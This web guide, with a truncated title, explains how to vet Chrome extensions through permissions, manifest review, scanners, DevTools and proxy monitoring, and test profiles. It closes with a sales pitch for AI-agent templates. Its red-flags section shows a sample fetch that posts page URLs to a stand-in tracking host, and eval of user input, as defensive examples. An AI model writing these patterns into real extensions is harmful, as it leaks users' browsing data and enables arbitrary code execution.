How to Check if a Chrome Extension (2026)

Last updated: April 17, 2026

Chrome extensions enhance browser functionality but can also access sensitive data. Before installing any extension, you should verify its safety. This guide covers practical methods for developers and power users to assess extension security.

Why Chrome Extension Security Matters

Chrome extensions run with broad permissions. They can read page content, modify DOM elements, capture keystrokes, and access cookies. A malicious extension can steal passwords, inject ads, or track browsing activity. The Chrome Web Store provides some screening, but threats still slip through. You need to evaluate extensions yourself.

Check Extension Permissions

Every extension lists required permissions in the Chrome Web Store. Visit the extension page and scroll to the “Permissions” section. Look for concerning access levels:

Read and change all your data on all websites. Full access to page content
Read your browsing history. Can track visited sites
Manage your downloads. Can modify download behavior
Tabs and browsing activity. Can monitor your browsing

Extensions requesting permissions beyond their stated purpose raise red flags. A simple calculator app should not need access to all websites.

Analyze the Extension Manifest

The manifest.json file defines what an extension can do. You can inspect it before installing using the CRX Extractor’s web interface or by downloading the extension package.

To manually inspect an extension:

Visit the Chrome Web Store page for the extension
Copy the extension ID from the URL (the 32-character string after “?id=”)
Navigate to https://clients2.google.com/service/update2/crx?response=redirect&prodversion=91.0&acceptformat=crx2,crx3&x=id%3D[EXTENSION_ID]%26uc
The file downloads. Extract it using a ZIP tool
Open manifest.json in a text editor

Review the permissions array and host permissions:

{
 "manifest_version": 3,
 "name": "Example Extension",
 "version": "1.0",
 "permissions": [
 "storage",
 "tabs"
 ],
 "host_permissions": [
 "https://*.example.com/*"
 ]
}

Compare requested permissions with the extension’s functionality. Excessive permissions indicate potential issues.

Use Static Analysis Tools

Several tools help analyze extension security:

Chrome Extension Source Viewer

This browser extension displays source code directly in the Web Store. Install it, visit any extension page, and click “View Source” to examine the code without downloading.

CRXCavator

Visit crxcavator.io and paste an extension URL. The tool analyzes permissions, reviews code complexity, and provides a risk score based on suspicious patterns.

npm package: chrome-extensions-scanner

For developers, this CLI tool scans extensions for common security issues:

npm install -g chrome-extensions-scanner
scan-extensions https://chrome.google.com/webstore/detail/your-extension-id

The scanner checks for:

Overly broad permissions
Use of eval() or Function constructor
External network requests
Inline script execution
Deprecated APIs

Examine Code for Red Flags

When reviewing extension source, watch for these warning signs:

Data Exfiltration

// Suspicious: sending data to unknown domains
fetch('https://analytics-tracker.example.com/collect', {
 method: 'POST',
 body: JSON.stringify({ url: location.href })
});

Persistent Scripts

// Content scripts that run on every page
"content_scripts": [{
 "matches": ["<all_urls>"],
 "js": ["content.js"]
}]

eval() Usage

// Dangerous: can execute arbitrary code
eval(userInput);
new Function(code)();

Legitimate extensions rarely need these patterns.

Check Developer Reputation

Research the extension developer before installing:

Developer website. Legitimate developers usually provide contact information
Reviews. Look for detailed reviews mentioning privacy or security
Update history. Frequent updates with changelogs indicate active maintenance
Open source. Check if the code is available on GitHub for community review

Extensions with no developer information or abandoned update histories pose higher risks.

Use Extension Firewall

For advanced protection, use extension management tools:

Extension Permissions Manager

Chrome’s built-in manager shows all installed extensions. Visit chrome://extensions and enable “Developer mode” to see details. Review permissions regularly and remove unused extensions.

Firefox uBlock Origin Approach

While not Chrome-specific, the principle applies: grant minimum necessary permissions. Some developers use separate browser profiles for extension testing.

Practical Workflow

Before installing any extension, follow this verification sequence:

Check Web Store listing. Read description, permissions, and reviews
Research the developer. Find their website and other extensions
Analyze the manifest. Use CRX Extractor to review permissions
Run static analysis. Use CRXCavator or npm scanner
Review source code. Check for suspicious patterns
Test in isolation. Use a separate profile for new extensions

Create a Chrome profile for testing
google-chrome --profile-directory="TestProfile"

Install the extension there first. Monitor network activity using Chrome DevTools to detect unexpected data transmission.

Monitoring Extensions After Installation

Most guides focus on pre-install checks, but ongoing monitoring is just as important. Extensions update silently in the background, and a legitimate extension acquired by a new owner can introduce malicious behavior in a subsequent update. This is a real attack vector. threat actors have purchased well-reviewed extensions specifically to push malicious updates to an established user base.

Chrome does not send notifications when an extension updates, which means you need a proactive monitoring strategy. The simplest approach is to periodically review the changelog in the Chrome Web Store and compare it against the installed version shown in chrome://extensions. A large jump in version numbers with no documented changelog is a warning sign worth investigating.

For a more systematic approach, developers can use the Chrome Extensions Update History tool or write a lightweight script that checks installed extension versions against the Web Store API and flags discrepancies:

Fetch current version from Chrome Web Store API
curl -s "https://clients2.google.com/service/update2/crx?response=manifest&x=id%3DEXTENSION_ID%26uc" \
 | grep -o 'version="[^"]*"' | head -1

Compare the result against what is installed. If the extension updated unexpectedly and the new version requests additional permissions, Chrome will prompt you to re-approve. never ignore those prompts or dismiss them without reading the new permission list.

Network Traffic Analysis

Reviewing source code catches static patterns, but dynamic analysis tells you what an extension actually does at runtime. Chrome DevTools provides everything you need to monitor extension network activity without additional software.

Open DevTools and navigate to the Network tab before triggering the extension’s main functionality. Filter by “XHR” and “Fetch” request types to isolate API calls. Look for requests to domains you do not recognize, particularly any that send data in the request body.

A cleaner approach for sustained monitoring is to use a local proxy like mitmproxy or Charles Proxy. Configure Chrome to route traffic through the proxy, then use the extension normally for a session. Review the captured traffic log afterward:

Start mitmproxy in transparent mode
mitmproxy --mode transparent --showhost
Filter to see only requests from a specific extension
Look for requests originating during extension actions

Pay particular attention to POST requests that fire immediately after you complete a form or enter a password. Legitimate extensions with no stated data-collection purpose have no reason to make these calls.

Sandboxing Extensions with Browser Profiles

Testing an extension in a separate Chrome profile is mentioned in many security guides, but few explain how to make this a sustainable part of a developer workflow rather than a one-off step.

The most practical setup is to maintain three Chrome profiles: your primary work profile, a testing profile with no saved credentials or personal data, and an isolated profile specifically for extensions that require broad permissions but that you have decided to trust after review.

You can launch Chrome profiles directly from the command line and script the creation of new testing sessions:

Launch Chrome with a specific profile for extension testing
google-chrome --profile-directory="ExtensionTest" \
 --no-first-run \
 --no-default-browser-check \
 --disable-sync

Within the testing profile, install only the extension under evaluation. Open DevTools and enable network logging before you trigger any extension functionality. After testing, review the network log and any console output. If the extension passes your review, you can install it in your primary profile with confidence.

For extensions that require access to specific sites (like a GitHub productivity tool that only needs access to github.com), use the Chrome permission controls to restrict the extension even further. Right-click the extension icon and select “This can read and change site data” to limit access to “When you click the extension” rather than granting automatic access on every page load.

Building an Internal Allowlist

Teams managing multiple developer machines benefit from maintaining a shared allowlist of reviewed and approved extensions. Rather than each developer independently evaluating the same tools, a single review can be documented and the result shared across the team.

A simple allowlist can be maintained as a JSON file in a shared repository:

{
 "approved_extensions": [
 {
 "name": "uBlock Origin",
 "id": "cjpalhdlnbpafiamejdnhcphjbkeiagm",
 "last_reviewed": "2026-02-10",
 "reviewer": "security-team",
 "notes": "Open source, well-audited, permissions match stated functionality"
 },
 {
 "name": "JSON Formatter",
 "id": "bcjindcccaagfpapjibcncadphpiiphl",
 "last_reviewed": "2026-01-22",
 "reviewer": "dev-team",
 "notes": "Only requests activeTab, no network requests observed"
 }
 ]
}

This approach creates an audit trail and ensures that approval decisions are documented with reasoning rather than being implicit. When an extension updates and requests new permissions, it triggers a re-review rather than silent approval.

Conclusion

Verifying Chrome extension safety requires multiple layers of inspection. No single method guarantees safety, but combining permission analysis, source code review, automated tools, and ongoing monitoring significantly reduces risk. Always question why an extension needs certain permissions, and prefer open-source extensions with active communities.

For developers building extensions, minimize permissions requested. Only ask for access your functionality absolutely requires. Users will increasingly scrutinize extensions, and transparent, minimal permission requests build trust.

Stay vigilant. Your browser extension security depends on proactive evaluation before installation, and continued attention after.

I'm a solo developer in Vietnam. 50K Chrome extension users. $500K+ on Upwork. 5 Claude Max subscriptions running agent fleets in parallel. These are my actual CLAUDE.md templates, orchestration configs, and prompts. Not a course. Not theory. The files I copy into every project before I write a line of code. **[See what's inside →](https://zovo.one/lifetime?utm_source=ccg&utm_medium=cta-default&utm_campaign=check-chrome-extension-safe)** $99 once. Free forever. 47/500 founding spots left.